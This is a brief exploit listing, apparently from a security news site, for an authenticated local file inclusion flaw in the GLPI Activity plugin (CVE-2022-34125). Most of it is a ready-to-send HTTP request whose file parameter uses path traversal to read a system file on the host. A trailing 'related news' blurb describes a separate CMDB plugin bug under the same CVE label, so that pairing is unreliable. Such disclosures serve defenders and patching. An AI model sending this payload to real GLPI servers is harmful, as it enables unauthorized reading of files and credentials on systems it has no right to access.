Headline
GLPI Activity Local File Inclusion
GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.
# Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeRelated news
CVE-2022-34125: Release GLPI ~10.0 : Version 3.0.3 disponible / available · InfotelGLPI/cmdb
front/icon.send.php in the CMDB plugin before 3.0.3 for GLPI allows attackers to gain read access to sensitive information via a _log/ pathname in the file parameter.